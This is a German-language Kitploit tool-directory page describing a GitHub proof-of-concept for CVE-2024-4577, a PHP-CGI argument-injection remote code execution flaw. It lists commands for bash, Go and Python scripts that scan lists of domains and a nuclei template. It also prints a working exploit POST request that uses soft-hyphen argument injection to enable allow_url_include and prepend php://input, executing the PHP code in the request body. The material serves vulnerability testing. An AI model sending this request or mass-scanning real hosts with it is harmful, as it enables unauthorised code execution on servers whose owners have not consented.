Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-4577-PHP-RCE — PHP RCE PoC für CVE-2024-4577, geschrieben in bash, go, python und einer nuclei-Vorlage | Kitploit
Tools/GitHubGitHub/zephrfish/cve-2024-4577-php-rce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubzephrfish/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

PHP RCE PoC für CVE-2024-4577, geschrieben in bash, go, python und einer nuclei-Vorlage

Repository anzeigen
33132vor 1 MonatVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PHP RCE PoC

CVE-2024-4577: Argument-Injektion in PHP-CGI

Übersicht

Dieses Repository enthält Skripte, um die Schwachstelle CVE-2024-4577 zu prüfen, eine Argument-Injektionsschwachstelle in PHP-CGI. Du kannst die bereitgestellten Bash-, Go- und Python-Skripte verwenden, um eine Liste von Domänen auf diese Schwachstelle zu testen. Ich habe außerdem eine Nuclei-YAML-Datei veröffentlicht.

Verwendung

Bash-Skript

Um das Bash-Skript zu verwenden, führe den folgenden Befehl aus:

root@kitploit:~
./CVE-2024-4577.sh /path/to/domains-list

Go-Skript

Speichere das Go-Skript zunächst in einer Datei namens CVE-2024-4577.go. Zum Erstellen und Ausführen des Go-Skripts:

  1. Kompiliere das Go-Skript in eine Binärdatei:

    root@kitploit:~
    go build -o CVE-2024-4577 CVE-2024-4577.go
    
  • Führe die Binärdatei mit der Domänenlisten-Datei als Argument aus:

    root@kitploit:~
    ./CVE-2024-4577 /path/to/domains-list
    
  • Python-Skript

    Speichere das Python-Skript zunächst in einer Datei namens CVE-2024-4577.py. Zum Ausführen des Python-Skripts:

    1. Stelle sicher, dass die Bibliothek requests installiert ist:

      root@kitploit:~
      pip install requests
      
    2. Führe das Python-Skript mit der Domänenlisten-Datei als Argument aus:

      root@kitploit:~
      python CVE-2024-4577.py /path/to/domains-list
      
    3. (Optional) Wenn du nur verwundbare Hosts ausgeben möchtest:

      root@kitploit:~
      python CVE-2024-4577.py /path/to/domains-list --quiet
      

    Proof of Concept (POC) erklärt

    Um die Schwachstelle manuell zu testen, kannst du die folgende POST-Anfrage senden:

    root@kitploit:~
    POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
    Host: {{host}}
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
    Accept: */*
    Content-Length: 23
    Content-Type: application/x-www-form-urlencoded
    Connection: keep-alive
    
    <?php phpinfo(); ?>
    

    Nuclei-Template

    Ich habe außerdem ein Nuclei-Template erstellt, um verwundbare Instanzen zu scannen. Es verwendet das v3-Layout-Schema und wurde in einer Laborumgebung getestet:

    root@kitploit:~
    nuclei -t CVE-2024-4577.yaml -u <target-url>
    

    Beispiel für eine Domänenliste

    Jeder Domäne in der Liste sollte http/https vorangestellt werden, um sicherzustellen, dass sie korrekt gelesen wird.

    root@kitploit:~
    http://example.com
    http://testsite.com
    http://vulnerablesite.com
    

    Beispielausgabe

    Wenn eine Domäne als verwundbar erkannt wird, sieht die Ausgabe folgendermaßen aus:

    root@kitploit:~
    http://example.com: Vulnerable
    http://vulnerablesite.com: Vulnerable
    
    Tool herunterladen